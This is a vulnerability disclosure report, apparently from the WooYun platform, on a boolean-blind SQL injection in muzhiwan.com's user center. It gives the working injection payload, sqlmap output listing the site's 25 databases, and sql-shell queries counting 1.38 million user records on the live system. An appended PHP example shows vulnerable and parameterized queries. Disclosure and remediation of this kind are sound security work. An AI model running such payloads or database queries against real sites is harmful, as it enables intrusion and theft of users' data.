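Vulnerability Summary
Bug ID: wooyun-2015-0147726
Vulnerability title: SQL injection on the Muzhiwan (拇指玩) main site affects the data of millions of users
Vendor: muzhiwan.com
Author: 路人甲
Submitted: 2015-10-19 11:57
Fixed: 2015-12-03 12:02
Disclosed: 2015-12-03 12:02
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 18
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2015-10-19: Details sent to the vendor, awaiting vendor handling
2015-10-19: Vendor confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and experts in related fields
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to trainee white hats
2015-12-03: Details disclosed to the public
Brief description:
Injection on the Muzhiwan main site affects the data of millions of users
Detailed description:
The injection point is on the main site, under User Center -> change phone model
MySQL boolean-based blind injection
Proof of vulnerability: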
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=album&aid=1 or 1=1-if(1=1 AND 4174=4174 ,0,(select 1 union select 2))
---
[03:12:54] [INFO] testing MySQL
[03:12:54] [INFO] confirming MySQL
[03:12:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
[03:12:54] [INFO] fetching database names
[03:12:54] [INFO] fetching number of databases
[03:12:54] [INFO] resumed: 25
[03:12:54] [INFO] resumed: information_schema
[03:12:54] [INFO] resumed: anquanxia
[03:12:54] [INFO] resumed: applanet_user
[03:12:54] [INFO] resumed: bug
[03:12:54] [INFO] resumed: googleinstall
[03:12:54] [INFO] resumed: googlemarket
[03:12:54] [INFO] resumed: googlemarketgame
[03:12:54] [INFO] resumed: muzhiwan
[03:12:54] [INFO] resumed: muzhiwan130409
[03:12:54] [INFO] resumed: muzhiwan130417
[03:12:54] [INFO] resumed: muzhiwanbbs
[03:12:54] [INFO] resumed: muzhiwanbbstest
[03:12:54] [INFO] resumed: muzhiwantest
[03:12:54] [INFO] resumed: mysql
[03:12:54] [INFO] resumed: mzw
[03:12:54] [INFO] resumed: mzw_new_gz
[03:12:54] [INFO] resumed: mzw_oa
[03:12:54] [INFO] resumed: mzwtest
[03:12:54] [INFO] resumed: redmine
[03:12:54] [INFO] resumed: sdk
[03:12:54] [INFO] resumed: stat
[03:12:54] [INFO] resumed: stat_sdk
[03:12:54] [INFO] resumed: test
[03:12:54] [INFO] resumed: testlink
[03:12:54] [INFO] resumed: wikidatabase
available databases [25]:
[*] anquanxia
[*] applanet_user
[*] bug
[*] googleinstall
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase
Root privileges; it looks like all the databases are here.
Let's look at the user tables
sql-shell> select count(*) from muzhiwanbbs.pre_ucenter_members
[03:05:24] [INFO] fetching SQL SELECT statement query output: 'select count(*) from muzhiwanbbs.pre_ucenter_members'
[03:05:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:05:24] [INFO] retrieved: 1386124
select count(*) from muzhiwanbbs.pre_ucenter_members: '1386124'
sql-shell> select count(*) from mzw.mzw_users
Affects the data of 1.38 million forum users
Fix:
You know what to do
Copyright notice: when reposting, please credit the source 路人甲@乌云
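The report leaves the fix unstated. As an added example (not part of the original report and not the vendor's code), the PHP below shows a concatenated numeric parameter beside a hardened form for a parameter like the `aid` field in the payload above. The table name, column names and function names are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example: hypothetical handler code, not taken from muzhiwan.com.
// SQLite in-memory replaces MySQL here; the albums table is constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE albums (aid INTEGER PRIMARY KEY, owner TEXT)');
$db->exec("INSERT INTO albums VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

// Vulnerable pattern: the request value is concatenated into the WHERE clause,
// so any SQL fragment in $aid becomes part of the statement.
function find_album_vulnerable(PDO $db, $aid)
{
    $sql = "SELECT aid, owner FROM albums WHERE aid = $aid";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: strict integer validation first, then a bound parameter,
// so the value can never change the shape of the query.
function find_album_safe(PDO $db, $aid)
{
    $id = filter_var($aid, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null; // reject: the caller should answer HTTP 400 and log the request
    }
    $stmt = $db->prepare('SELECT aid, owner FROM albums WHERE aid = :aid');
    $stmt->bindValue(':aid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: two well-formed ids and the tautology prefix from the payload.
foreach (array('1', '2', '1 or 1=1') as $aid) {
    $vulnerable = count(find_album_vulnerable($db, $aid));
    $safe = find_album_safe($db, $aid);
    printf("%-10s vulnerable rows=%d  safe=%s\n", $aid, $vulnerable,
           $safe === null ? 'rejected' : count($safe) . ' row(s)');
}
```

The report also notes that the injected connection had root privileges and could see all 25 databases; giving each application its own database account restricted to its own schema limits what a single injection point can read.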
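Vulnerability Response
Vendor response:
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-10-19 12:00
Vendor reply:
Thank you, we will fix it as soon as possible
Latest status:
None yet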